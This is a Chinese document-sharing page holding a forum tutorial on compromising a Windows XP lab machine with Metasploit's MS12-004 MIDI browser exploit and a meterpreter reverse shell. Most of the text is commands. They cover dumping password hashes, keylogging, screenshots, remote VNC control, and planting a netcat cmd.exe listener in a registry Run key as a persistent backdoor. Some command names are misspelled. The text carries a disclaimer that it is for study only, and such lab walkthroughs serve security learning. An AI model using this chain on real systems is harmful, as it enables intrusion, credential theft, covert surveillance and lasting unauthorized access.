为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

利用Metasploit进行渗透测试

2013-01-23 14页 doc 8MB 28阅读

用户头像

is_235171

暂无简介

举报
利用Metasploit进行渗透测试 利用Metasploit进行渗透测试 声明:本教程仅限供广大网络安全爱好者交流学习之用,任何人不得用于非法用途,否则后果自负。 和凡哥说想进法客论坛,凡哥说要原创作品,科普的就行。科普文章,所以大牛们请绕道..... 最近在玩Backtrack 5 ,就把最近学到的东西和论坛的Fucker们分享下。 所有工具都是Backtrack 5 自带的, 用到的工具 : 大名鼎鼎的Metasploit Feamwork 还有 Netcat 要利用的漏洞:MS12-004 ,虽然漏洞是几个月前出的了,但这里只做渗透...
利用Metasploit进行渗透测试
利用Metasploit进行渗透测试 声明:本教程仅限供广大网络安全爱好者交流学习之用,任何人不得用于非法用途,否则后果自负。 和凡哥说想进法客论坛,凡哥说要原创作品,科普的就行。科普文章,所以大牛们请绕道..... 最近在玩Backtrack 5 ,就把最近学到的东西和论坛的Fucker们分享下。 所有工具都是Backtrack 5 自带的, 用到的工具 : 大名鼎鼎的Metasploit Feamwork 还有 Netcat 要利用的漏洞:MS12-004 ,虽然漏洞是几个月前出的了,但这里只做渗透演示,重点在讲解工具的使用方法。 废话不说,看步骤 : 在控制台执行 msfconsole 启动Metasploit , 输入命令 search ms12_004,我们来找找ms12-004漏洞的利用模块 已经找到了,接下来使用该模块 输入命令 Use exploits/windows/browser/ms12_004_midi 接下来输入命令 show options ,显示该漏洞的基本信息,以及要设置的参数 设置参数: 输入命令 : set SRVHOST 192.168.42.139 Set PAYLOAD windows/meterpreter/reverse_tcp Set LHOST 192.168.42.130 Set URIOATH / 最后 再输入show options ,查看是否设置好 已经OK了,开始渗透。 执行命令 :Exploit 可以看到服务已经启动了,链接地址http://192.168.42.130:8080/ 在用Xp打开恶意链接地址 http://192.168.42.130:8080/ BackTrack 开始渗透, 这边BT5已经有反应了 ,渗透成功~ 输入命令 Sessions 我们看到有一个会话,会话的 ID 是1 ,开打开这个会话 输入命令 Sessions -i 1 这时,我们已经进入了Meterpreter Meterpreter 是一个很强大的 payload , 具体说明输入 help 可以看到, Meterpreter > hashdump // 可以看到远程主机帐号和加密后的密码 这里再说几个常用的Meterpreter 命令 Meterpreter > keyscan_start //开启键盘记录 Meterpreter > heyscan_dump // 查看键盘记录的内容 Meterpreter > keyscan_stop // 关闭键盘记录 Meterpreter > shell //看下图大家都懂的 Meterpreter > ps // 获取远程主机进程列表,比windows自带的任务管理器清晰多了 Meterpreter > screenshot // 截取远程桌面屏幕 Meterpreter > run vnc // 开启远程主机vnc 服务 过一会,可以看到桌面,并且可以控制鼠标和键盘 好,下来我们来留后门,方便以后常来 ~ 先上传 nc.exe(netcant)到windows的systen32文件夹下 Upload /pentest/windows-binaries/tools/nc.exe c:\\windows\\system32 已经成功了,下来我们将nc.exe加到注册表,让他开机自启动 先查看注册表 Reg enumkey -k HKLM\\SOFTWARE\\Miorosoft\\Windows\\CurrentVersion\\Run 已经可以看到注册表键值了 下来加入注册表 Reg setval -k HKLM\\SOFTWARE\\Miorosoft\\Windows\\CurrentVersion\\Run -v backdoor -d c:\\windows\\system32\\nc.exe"-L -d -p 443 cmd.exe" (上面是一条命令) 提示成功,看看XP的注册表 已经有了这个键值 我们重启远程主机试下 输命令 reboot 由于远程主机已经关闭,显示链接断开 ,等xp重启后,我们试试留的后门 Telnet 192.168.42.139 443 已经连接成功了 : ) .。刚接触BT5,各位Fucker们见笑了 ... 论坛有玩B5或者 Metasploit 的基友可以联系我,求交流。 QQ :791628659 By Breaker
/
本文档为【利用Metasploit进行渗透测试】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索